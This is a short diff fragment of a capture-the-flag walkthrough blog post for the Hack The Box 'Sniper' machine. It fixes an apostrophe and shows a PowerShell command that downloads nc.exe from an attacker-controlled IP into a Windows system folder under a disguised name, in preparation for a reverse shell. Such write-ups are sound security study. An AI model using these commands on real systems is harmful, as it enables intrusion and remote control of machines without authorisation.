limbernie/limbernie.github.io/_posts/2020-03-28-sniper-htb-walkthrough.md

 ![f53edaf5.png](/assets/images/posts/sniper-htb-walkthrough/f53edaf5.png)
 </a>

 See?
 So much neater!
-Now, let\'s see how we can get a reverse shell.
+Now, let's see how we can get a reverse shell.
 I used the following command to download a copy of `nc.exe` from Kali Linux to `C:\Windows\System32\spool\drivers\color`.

 ```
 # ./tidy.sh 'powershell /c iwr http://10.10.15.171/nc.exe -outf \windows\system32\spool\drivers\color\cute.exe'